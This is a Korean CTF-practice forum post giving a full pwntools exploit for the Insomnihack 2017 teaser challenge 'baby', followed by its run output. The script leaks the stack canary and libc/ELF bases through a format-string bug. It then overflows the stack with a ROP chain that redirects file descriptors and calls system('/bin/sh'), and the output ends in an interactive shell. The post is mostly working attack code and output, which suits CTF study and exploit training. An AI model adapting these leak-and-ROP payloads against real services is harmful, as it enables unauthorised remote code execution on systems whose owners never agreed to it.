[insomnihack teaser 2017] baby

해킹대회 문제 풀이 연습장소

Moderator: amesianx

Post Reply
amesianx
Posts: 65
Joined: Tue Oct 13, 2015 11:21 am

[insomnihack teaser 2017] baby

Post by amesianx » Wed Jan 25, 2017 1:56 am

pwntools 이용해서 쉽게 익스플로잇하기.. :D

Code: Select all

from pwn import *                                                                                                  
                                                                                                                   
context.clear(arch='amd64')                                                                                        
                                                                                                                   
elf = ELF('./baby')                                                                                                
libc = ELF('./libc.so')                                                                                            

# change your own __libc_start_main_ret                                                                                                                   
start_main_ret = 0x21f45                                                                                           
                                                                                                                   
# conn = remote('baby.teaser.insomnihack.ch', 1337)                                                                
conn = remote('localhost', 1337)                                                                                   
print conn.recvuntil("Your choice >")                                                                              
                                                                                                                   
conn.send('2\n')                                                                                                   
print conn.recvuntil("Your format >")                                                                              
                                                                                                                   
"""                                                                                                                
# search for (libc & elf)  base                                                                                    
i = 130                                                                                                            
while i < 200:                                                                                                     
  fmt = '%' + str(i) + '$.16lx'                                                                                    
  conn.send('A'*8 + ':' + fmt + '\n')                                                                              
  c = conn.recvuntil("Your format >")                                                                              
  c = c.split(':')[1].strip()                                                                                      
  c = c.split('\n')[0].strip()                                                                                     
  c = int(c, 16)                                                                                                   
  # if (c & 0x9cf) == 0x9cf:                                                                                       
  if (c & 0xfff) == 0xf45:                                                                                         
    print 'found is ' + str(i)                                                                                     
    break                                                                                                          
  i += 1                                                                                                           
"""                                                                                                                
                                                                                                                   
conn.send('%138$.16lx_%140$.16lx_%158$.16lx_\n')                                                                   
c = conn.recvuntil("Your format >")                                                                                
                                                                                                                   
canary = c.split('_')[0]                                                                                           
ret_addr = c.split('_')[1]                                                                                         
libc_base = c.split('_')[2]                                                                                        
                                                                                                                   
canary = int(canary, 16)                                                                                           
ret_addr = int(ret_addr, 16)                                                                                       
libc_base = int(libc_base, 16) - start_main_ret                                                                    
elf_base = ret_addr - 0x19cf                                                                                       
                                                                                                                   
print 'canary is ' + str(hex(canary))                                                                              
print 'return is ' + str(hex(ret_addr))                                                                            
print 'libc base is ' + str(hex(libc_base))                                                                        
print 'elf base is ' + str(hex(elf_base))                                                                          
conn.send('\n')
print conn.recvuntil("Your choice >")
conn.send('1\n')
print conn.recvuntil("How much bytes you want to send ? ")

elf.address = elf_base
libc.address = libc_base

rop = ROP(libc)

rop.dup2(4, 2)
rop.dup2(4, 1)
rop.dup2(4, 0)

s = "Welcome to baby's first pwn."
rop.write(4, next(elf.search(s)), len(s))
rop.system(next(libc.search('/bin/sh\x00')))
print rop.dump()

payload = '\x41'*1032 + p64(canary) + p64(0) + rop.chain()

conn.send(str(len(payload)) + '\n')
conn.send(payload)

conn.interactive()
conn.close()


[result]

root@USER ~/.project/CTF
# python ex.py
[+] Opening connection to localhost on port 1337: Done
Welcome to baby's first pwn.
Pick your favorite vuln :
   1. Stack overflow
   2. Format string
   3. Heap Overflow
   4. Exit
Your choice >
 Simply type '\n' to return
Your format >
canary is 0x9e907d5611d90900
return is 0x7f2d640019cf
libc base is 0x7f2d63830000
elf base is 0x7f2d64000000
 Welcome to baby's first pwn.
Pick your favorite vuln :
   1. Stack overflow
   2. Format string
   3. Heap Overflow
   4. Exit
Your choice >
 How much bytes you want to send ?
[*] Loaded cached gadgets for './libc.so'
0x0000:   0x7f2d63852b9a pop rdi; ret
0x0008:              0x4
0x0010:   0x7f2d63854885 pop rsi; ret
0x0018:              0x2
0x0020:   0x7f2d6391be90 dup2
0x0028:   0x7f2d6383028f <adjust: ret>
0x0030:   0x7f2d63852b9a pop rdi; ret
0x0038:              0x4
0x0040:   0x7f2d63854885 pop rsi; ret
0x0048:              0x1
0x0050:   0x7f2d6391be90 dup2
0x0058:   0x7f2d6383028f <adjust: ret>
0x0060:   0x7f2d63852b9a pop rdi; ret
0x0068:              0x4
0x0070:   0x7f2d63854885 pop rsi; ret
0x0078:              0x0
0x0080:   0x7f2d6391be90 dup2
0x0088:   0x7f2d6383028f <adjust: ret>
0x0090:   0x7f2d63852b9a pop rdi; ret
0x0098:              0x4
0x00a0:   0x7f2d63854885 pop rsi; ret
0x00a8:   0x7f2d64001e30
0x00b0:   0x7f2d63831b8e pop rdx; ret
0x00b8:             0x1c
0x00c0:   0x7f2d6391b700 write
0x00c8:   0x7f2d6383028f <adjust: ret>
0x00d0:   0x7f2d63852b9a pop rdi; ret
0x00d8:   0x7f2d639ac8c3
0x00e0:   0x7f2d63876590 system
0x00e8:       'iaacjaac' <pad>
[*] Switching to interactive mode
Good luck !
Welcome to baby's first pwn.$ ls -al
합계 36
drwxr-xr-x 2 baby baby     0  1월 24 23:37 .
drwxr-xr-x 2 root root     0  1월 23 06:21 ..
-rw-r--r-- 1 baby baby   220  1월 22 00:45 .bash_logout
-rw-r--r-- 1 baby baby  3637  1월 22 00:45 .bashrc
-rw------- 1 root root   824  1월 22 06:35 .gdb_history
-rw-r--r-- 1 baby baby   675  1월 22 00:45 .profile
-rwxrwxrwx 1 root root 17840  1월 21 22:39 baby
-rw-rw-rw- 1 root root    71  1월 22 06:05 peda-session-baby.txt
$

Post Reply

Who is online

Users browsing this forum: No registered users and 18 guests